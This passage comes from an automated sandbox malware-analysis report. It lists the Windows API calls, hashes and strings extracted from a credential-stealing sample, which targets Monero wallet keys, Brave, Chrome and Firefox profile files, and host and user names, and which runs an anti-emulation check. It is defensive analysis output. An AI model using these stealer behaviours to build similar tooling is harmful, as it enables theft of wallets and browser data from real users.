                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: ba1e562faf1a75ba2ac364b37aa8ca0b3b87afd7174f87982f1a9953065d19f7
                                  • Instruction ID: cbbedf09e134e09f353189add4dfbb3979bbee9f2b720173a274969b13f3da47
                                  • Opcode Fuzzy Hash: ba1e562faf1a75ba2ac364b37aa8ca0b3b87afd7174f87982f1a9953065d19f7
                                  • Instruction Fuzzy Hash: 0FF0DA7094031AAFEB20BBA09C86BFD7BB4EB04701F104595B512E5291DBF46940D6A6

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4849
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: 5791d414862abea404d4ec27454b95788f2bafd91b32419e9c97506bb2830d22
                                  • Instruction ID: 6f09c97187468cff49feb6409bf5899ba354e0846e9b5b173d8a5e76663aa207
                                  • Opcode Fuzzy Hash: 5791d414862abea404d4ec27454b95788f2bafd91b32419e9c97506bb2830d22
                                  • Instruction Fuzzy Hash: BA211FB1D00209ABDF14EFA4E845AED7B74FB45320F108625F955BB2D0DB706A09CF91

                                  APIs
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA6280: InternetOpenA.WININET(00BC0DFE,00000001,00000000,00000000,00000000), ref: 00BA62E1
                                    • Part of subcall function 00BA6280: StrCmpCA.SHLWAPI(?,01410EE0), ref: 00BA6303
                                    • Part of subcall function 00BA6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA6335
                                    • Part of subcall function 00BA6280: HttpOpenRequestA.WININET(00000000,GET,?,01410328,00000000,00000000,00400100,00000000), ref: 00BA6385
                                    • Part of subcall function 00BA6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BA63BF
                                    • Part of subcall function 00BA6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA63D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5228
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: 3eed64c6bf0eaab0a9ef5d528582344489fc597f6f7741aa6a134d6edaa7f1e0
                                  • Instruction ID: a8a4d399560d4d6e711235878c1e44dabf26bb8d506ebecb79d40c396e7fbb82
                                  • Opcode Fuzzy Hash: 3eed64c6bf0eaab0a9ef5d528582344489fc597f6f7741aa6a134d6edaa7f1e0
                                  • Instruction Fuzzy Hash: CC11FE70D14148BBDB14FF64DD92AFD77B8AF50300F404598F91A6A592EFB0AB05C6A2
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BA112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00BA1132
                                  • ExitProcess.KERNEL32 ref: 00BA1143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: a02972a5e7a9afffe503007dea6ce09fe0a600c3609430746b9716e013e063e0
                                  • Instruction ID: c89dd2fb689869d918338c8b74c30d4fc533d4bc7aaa31dc738cb6ef733beb5b
                                  • Opcode Fuzzy Hash: a02972a5e7a9afffe503007dea6ce09fe0a600c3609430746b9716e013e063e0
                                  • Instruction Fuzzy Hash: A0E08670949348FFE750BBA89C4AB087AB8EB04B01F104084F708BA2C0D6B4360096A9
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00BA10B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00BA10F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: ee10474615a619198e5a174bebcb311f6af5d3b76b44cf8abf500832e7de3a92
                                  • Instruction ID: 1bab7abd49234839ba70d772289547a0a2beae9015d800a32fc9a14fa0b84fe0
                                  • Opcode Fuzzy Hash: ee10474615a619198e5a174bebcb311f6af5d3b76b44cf8abf500832e7de3a92
                                  • Instruction Fuzzy Hash: 1EF0E971641304BBE714A6A89C89FBAB7ECD705715F301844F544E7280D5716E00CAA0
                                  APIs
                                    • Part of subcall function 00BB78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7910
                                    • Part of subcall function 00BB78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7917
                                    • Part of subcall function 00BB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BB792F
                                    • Part of subcall function 00BB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BA11B7), ref: 00BB7880
                                    • Part of subcall function 00BB7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7887
                                    • Part of subcall function 00BB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BB789F
                                  • ExitProcess.KERNEL32 ref: 00BA11C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: ac97049e5ef86f76481eece99d5ae9935b867d1699f17001b2906201fae1d8d0
                                  • Instruction ID: de03f6074eef25330277015b70a1feee6b5614698417c66c053a91b2ec5ee5ab
                                  • Opcode Fuzzy Hash: ac97049e5ef86f76481eece99d5ae9935b867d1699f17001b2906201fae1d8d0
                                  • Instruction Fuzzy Hash: DEE012B595430253CA0073BAAC4AB7A37DC9B55385F0408A8FA09E6202FE65F801C576
                                  APIs
                                  • wsprintfA.USER32 ref: 00BB38CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB38E3
                                  • lstrcat.KERNEL32(?,?), ref: 00BB3935
                                  • StrCmpCA.SHLWAPI(?,00BC0F70), ref: 00BB3947
                                  • StrCmpCA.SHLWAPI(?,00BC0F74), ref: 00BB395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB3C67
                                  • FindClose.KERNEL32(000000FF), ref: 00BB3C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 032abf00597f153983981e2cba6acddafc6b2f0337b69438b18147e0bd4ab9a6
                                  • Instruction ID: 3979ea2be40aa8d59ad60199ad445ba2ea94e0d835f281862c643eb46a7ed4c6
                                  • Opcode Fuzzy Hash: 032abf00597f153983981e2cba6acddafc6b2f0337b69438b18147e0bd4ab9a6
                                  • Instruction Fuzzy Hash: C5A12EB1900259ABDB24EFA4DC85FFE77B8EB49700F0445C8A50D96141EB75AB84CF62
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • FindFirstFileA.KERNEL32(00000000,?,00BC0B32,00BC0B2B,00000000,?,?,?,00BC13F4,00BC0B2A), ref: 00BABEF5
                                  • StrCmpCA.SHLWAPI(?,00BC13F8), ref: 00BABF4D
                                  • StrCmpCA.SHLWAPI(?,00BC13FC), ref: 00BABF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAC7BF
                                  • FindClose.KERNEL32(000000FF), ref: 00BAC7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: 721584d7369d7d44194affdbc1daf271ed3a6c7f441d0963486cffbd8cdb2419
                                  • Instruction ID: a75f362a59c0ef45af7ba3fe7bc161d762b284883e1642ffef108d928fc9e784
                                  • Opcode Fuzzy Hash: 721584d7369d7d44194affdbc1daf271ed3a6c7f441d0963486cffbd8cdb2419
                                  • Instruction Fuzzy Hash: A6424272D10108ABDB14FB74DD96EFD73BCAB94300F4045D8B50AA6191EE74AF49CBA2
                                  APIs
                                  • wsprintfA.USER32 ref: 00BB492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB4943
                                  • StrCmpCA.SHLWAPI(?,00BC0FDC), ref: 00BB4971
                                  • StrCmpCA.SHLWAPI(?,00BC0FE0), ref: 00BB4987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB4B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00BB4B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 79a896fd431301a114d02bb661c8cbdc0b350b65b32b6d28b78fce2b9c135947
                                  • Instruction ID: 7f590789e9ddacd3a402b80b3e78ac33b97a45cdb95368f676178dbab392b590
                                  • Opcode Fuzzy Hash: 79a896fd431301a114d02bb661c8cbdc0b350b65b32b6d28b78fce2b9c135947
                                  • Instruction Fuzzy Hash: AD6131B1910219ABCB20FBA4DC85FFA73BCBB58700F0445CCB649D6141EB71AB858FA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BB4580
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB4587
                                  • wsprintfA.USER32 ref: 00BB45A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB45BD
                                  • StrCmpCA.SHLWAPI(?,00BC0FC4), ref: 00BB45EB
                                  • StrCmpCA.SHLWAPI(?,00BC0FC8), ref: 00BB4601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB468B
                                  • FindClose.KERNEL32(000000FF), ref: 00BB46A0
                                  • lstrcat.KERNEL32(?,01410FA0), ref: 00BB46C5
                                  • lstrcat.KERNEL32(?,0140F918), ref: 00BB46D8
                                  • lstrlen.KERNEL32(?), ref: 00BB46E5
                                  • lstrlen.KERNEL32(?), ref: 00BB46F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: 60061187ddb9dbf8feedeac32f03547fbea05f69d67ffd76e33e83be092a2e24
                                  • Instruction ID: 3547a82913d4b05aad15f9127cd2b79878fb864b4a19506c4938f33fe79fbbac
                                  • Opcode Fuzzy Hash: 60061187ddb9dbf8feedeac32f03547fbea05f69d67ffd76e33e83be092a2e24
                                  • Instruction Fuzzy Hash: 6A5143B59102199BCB24FB74DCC9FED77BCAB54300F4045C8B649D6151EB74AA848FA2
                                  APIs
                                  • wsprintfA.USER32 ref: 00BB3EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB3EDA
                                  • StrCmpCA.SHLWAPI(?,00BC0FAC), ref: 00BB3F08
                                  • StrCmpCA.SHLWAPI(?,00BC0FB0), ref: 00BB3F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB406C
                                  • FindClose.KERNEL32(000000FF), ref: 00BB4081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 7b9565193b08ce0914fa7e2c5d179e4f9b71384527e59e2be1912eef58665c3f
                                  • Instruction ID: 1b5357c20e1a62d8d54dff7db87d7f0c27f1e0d3630cc839d5019259eddd3a67
                                  • Opcode Fuzzy Hash: 7b9565193b08ce0914fa7e2c5d179e4f9b71384527e59e2be1912eef58665c3f
                                  • Instruction Fuzzy Hash: 0F5132B6900219ABCB24FBA4DCC5EFA73BCBB54700F4045C8B65996140DB75AB858FA1
                                  APIs
                                  • wsprintfA.USER32 ref: 00BAED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BAED55
                                  • StrCmpCA.SHLWAPI(?,00BC1538), ref: 00BAEDAB
                                  • StrCmpCA.SHLWAPI(?,00BC153C), ref: 00BAEDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAF2AE
                                  • FindClose.KERNEL32(000000FF), ref: 00BAF2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: 05531193d52bf4fea1630e6dc7aa450b6b123e6ce5b8b34cbb78328548237360
                                  • Instruction ID: 38bb76c5faed73a222c6166a518df50d2339e64ba016f66950824894414b6827
                                  • Opcode Fuzzy Hash: 05531193d52bf4fea1630e6dc7aa450b6b123e6ce5b8b34cbb78328548237360
                                  • Instruction Fuzzy Hash: 92E1D371D11118ABEB64FB64CC92EFE73B8AF54300F4045D9B50A62492EE706F8ACF61
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BC15B8,00BC0D96), ref: 00BAF71E
                                  • StrCmpCA.SHLWAPI(?,00BC15BC), ref: 00BAF76F
                                  • StrCmpCA.SHLWAPI(?,00BC15C0), ref: 00BAF785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAFAB1
                                  • FindClose.KERNEL32(000000FF), ref: 00BAFAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: cd8ead02a9625645b165289029504b6b0d49e85e65a2dc3ec69d0293a0247d95
                                  • Instruction ID: aedb091b5467d01207c1d9f55a98321b15df17a3da745e4e039b95c8faaa7855
                                  • Opcode Fuzzy Hash: cd8ead02a9625645b165289029504b6b0d49e85e65a2dc3ec69d0293a0247d95
                                  • Instruction Fuzzy Hash: 1EB11371D00219AFDB24FF64DC95EFE73B9AF55300F4085E8A40AA6191EF706B49CB92
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BC510C,?,?,?,00BC51B4,?,?,00000000,?,00000000), ref: 00BA1923
                                  • StrCmpCA.SHLWAPI(?,00BC525C), ref: 00BA1973
                                  • StrCmpCA.SHLWAPI(?,00BC5304), ref: 00BA1989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BA1D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BA1DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BA1E20
                                  • FindClose.KERNEL32(000000FF), ref: 00BA1E32
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: ffe1b7e9a110f0aa1350027476f8ab25140044126876ab55dc64f75d0570edca
                                  • Instruction ID: 2f2284763736855424ce8f823b401969ad1fd305134ff2ddb27862c6fb49eca7
                                  • Opcode Fuzzy Hash: ffe1b7e9a110f0aa1350027476f8ab25140044126876ab55dc64f75d0570edca
                                  • Instruction Fuzzy Hash: 0512CD71D10118ABDB25FB60CCA6EFE73B8AF54300F4045D9A54A66491EFB06F89CFA1
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00BC0C2E), ref: 00BADE5E
                                  • StrCmpCA.SHLWAPI(?,00BC14C8), ref: 00BADEAE
                                  • StrCmpCA.SHLWAPI(?,00BC14CC), ref: 00BADEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAE3E0
